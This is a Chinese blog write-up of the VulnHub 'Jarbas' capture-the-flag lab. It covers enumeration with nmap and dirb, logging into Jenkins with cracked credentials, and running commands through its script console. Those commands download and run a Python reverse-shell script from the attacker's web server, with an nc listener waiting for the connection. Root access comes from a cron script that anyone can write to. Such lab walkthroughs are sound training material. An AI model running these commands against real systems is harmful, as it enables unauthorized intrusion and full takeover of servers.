渗透测试之靶机试炼(七)

最新推荐文章于 2023-11-25 17:11:35 发布
最新推荐文章于 2023-11-25 17:11:35 发布
阅读量741 收藏 5
点赞数
分类专栏: 靶机试炼 文章标签: CTF Linux提权 渗透测试 靶机 jenkins getshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/simple___sunny/article/details/87721994
版权

靶机简介

靶机地址:
https://download.vulnhub.com/jarbas/Jarbas.zip.torrent

运行环境:
VirtualBox

攻击测试机环境
kali
win 10

工具简介
nmap
dirb
python
nc

靶机网卡设置

三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。
在这里插入图片描述

信息收集

首先nmap全网段扫描,找到目标主机ip
命令 nmap 10.211.55.0/24
在这里插入图片描述
访问80端口
在这里插入图片描述继续进行信息收集,目录爆破,这里先使用dirb爆破无果,使用参数
dirb http://10.211.55.32 -X .html
在这里插入图片描述发现access.html,打开
在这里插入图片描述发现三个用户名,及MD5加密的密码,解密得到
tiago:italia99
trindade:marianna
eder:vipsu
尝试首页登录,未成功
然后访问8080端口
在这里插入图片描述发现时jenkins,尝试使用发现的密码登录,最后使用eder:vipsu登录成功
在这里插入图片描述这里我们利用jenkins的一个命令执行的漏洞
位置在:http://10.211.55.32:8080/script
在这里插入图片描述执行命令使用特殊的方法
println “命令”.execute().text
在这里插入图片描述命令执行成功了,那么我们就在本地写一个python的反弹shell的脚本,利用命令执行下载,执行。
脚本如下,10.211.55.8 是攻击机ip
在这里插入图片描述
利用python 开启简单的web服务
python -m SimpleHTTPServer 8888
在这里插入图片描述
利用命令执行进行下载
println “wget http://10.211.55.8:8888/shell.py -P /tmp/”.execute().text
在这里插入图片描述查看是否下载成功
命令:println “ls /tmp/”.execute().text
在这里插入图片描述然后使用攻击机监听本地1234端口
nc -lvp 1234
在这里插入图片描述
命令执行执行该反弹shell的脚本
命令:println “python /tmp/shell.py”.execute().text
在这里插入图片描述本地获取到目标主机的shell
在这里插入图片描述

提权

首先,利用python获取交互式shell
命令:python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述获取交互式shell后进行信息收集,信息收集的过程就是耐心查看每个文件,这里作者直接给出提权方法,利用计划任务提权,这也是一种较为常见的提权方式
首先查看计划任务
命令:cat /etc/crontab
在这里插入图片描述发现会以root权限定时执行该sh脚本
我们通过修改该脚本进行提权
利用之前下载的python反弹shell的paylaod即可
将执行该脚本的命令写入该文件
命令: echo “python /tmp/shell.py” >/etc/script/CleaningScript.sh
在这里插入图片描述
再开一个cmd窗口,监听本地1234端口
在这里插入图片描述
等待一会即可弹回root权限的shell
在这里插入图片描述

一只会飞天的松鼠
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 6596
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
JARBAS - VulnHub(漏洞靶场渗透测试
Start C的博客
12-06 301
VulnHub的一个靶场
【Vulnhub靶机】Jarbas--Jenkins
过期的秋刀鱼
11-25 952
文档说明:https://www.vulnhub.com/entry/jarbas-1,232/选择第一个自由风格软件项目就可以,然后往下翻,点击确定。的漏洞利用方式有很多,可以自行去网上查阅相关资料。由于目标系统是linux系统,所以选择第二个。我们拿到shell是没有回显的,可以通过。并没有识别到类似的CMS内容管理系统,尝试使用上面解密出来的密码进行登陆。页面上会显示有一个任务正在运行。可以在里面添加反弹shell,就反弹到kali机器上了。详细扫描服务版本,系统。点击应用,然后点击保存。
jarbas靶机攻略
qq_58683895的博客
10-18 61
使用目录扫描扫出来两个页面8080端口的扫描结果如图其中8080应该是后台登录框robots文件内容如图。
jarbars靶机渗透流程
RemedyVI的博客
07-09 195
首先使用nmap进行了端口扫描,发现了一个后台登录接口。通过目录扫描,得到了一组用户名和密码,能够登录到后台的jenkins系统。在jenkins系统中,新建了一个item并执行了shell命令,从而获得了一个反弹shell,可以得到了一个低权限用户。进一步发现了一个以root权限运行的计划任务,该任务执行了一个sh文件。幸运的是这个sh文件对所有人都是可读写执行的。通过向这个sh文件写入另一个反弹shell,成功地获得了root权限,最后获取flag。
基于jarbas渗透测试的学习笔记
gaily123的博客
10-26 555
实验环境 kali:192.168.79.130 jarbas:192.168.79.141 均为NAT模式 实验步骤 1.主机发现 nmap -sP 192.168.79.0/24 主机ip是192.168.79.141 2.端口发现 nmap -A -vv 192.168.79.141 发现主机开放的端口是22 80 3306 8080 3.目录发现 dirb http://192.168...
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2632
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机的网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
渗透测试-靶机打靶思路与方法
lza20001103的博客
08-18 3749
渗透测试-靶机打靶思路与方法 文章目录渗透测试-靶机打靶思路与方法一.对靶机进行信息收集1.首先对目标存活靶机发起嗅探:2.对目标主机开放端口及服务发起探测3.对非web端口的服务发起迅速的嗅探,尝试使用nday进行攻击4.开始进行web端口外部打点尝试二.一些靶机打点的工具和知识三.进行linux下的提权四.总结 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: ①sudo arp-scan -l 针对网卡发起扫描存活主机 ②arping扫描:for i in (seq 1 254);do arp
综合靶机渗透测试解析
w_j_x_123的博客
05-30 453
7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);1. 扫描目标靶机靶机开放的所有端口,当作 flag 提交(例:21,22,23)
全网最详细的自动化测试(Jenkins 篇)
hlsxjh的博客
09-20 923
Robot Framework是一个基于Python的,可扩展的关键字驱动的自动化测试框架。
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4-Web渗透测试靶机
01-19
DC-4
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
渗透测试靶机试炼(一)
热门推荐
simple___sunny的博客
01-10 1万+
1
渗透测试靶机试炼(二)
simple___sunny的博客
01-21 1481
123
渗透测试靶机试炼(八)
simple___sunny的博客
02-21 1060
靶机简介 靶机地址: https://download.vulnhub.com/trollcave/trollcave-v1-2.ova.torrent 运行环境: VirtualBox 攻击测试机环境 kali win 10 工具简介 nmap dirb python nc 靶机网卡设置 三台虚拟主机在同一局域网即可 作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。 信息收集 ...
渗透测试靶机试炼(十)
simple___sunny的博客
04-04 1014
靶机简介 靶机地址: https://download.vulnhub.com/homeless/ 运行环境: VirtualBox 攻击测试机环境 kali win 10 工具简介 nmap dirb python nc burp curl fastcoll tail 靶机网卡设置 三台虚拟主机在同一局域网即可 作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。 首先使用nmap进...
kali linux渗透测试靶机
最新发布
02-23
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它集成了大量的渗透测试工具和资源,使得安全专业人员能够有效地评估和保护网络系统的安全性。 Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux渗透测试靶机: 1. Metasploitable:Metasploitable是一个故意构建的易受攻击的虚拟机,它包含了多个漏洞和弱点,可以用于学习和实践Metasploit框架的使用。 2. DVWA(Damn Vulnerable Web Application):DVWA是一个故意构建的Web应用程序,包含了多个常见的Web漏洞,如SQL注入、XSS等,可以用于学习和实践Web应用程序渗透测试技术。 3. OWASP Mutillidae II:Mutillidae II是一个故意构建的Web应用程序,旨在模拟真实世界中的各种Web漏洞和攻击场景,包括SQL注入、文件包含等。 4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和探索这些靶机,安全专业人员可以提高他们的渗透测试技能,并了解如何保护网络系统免受各种攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值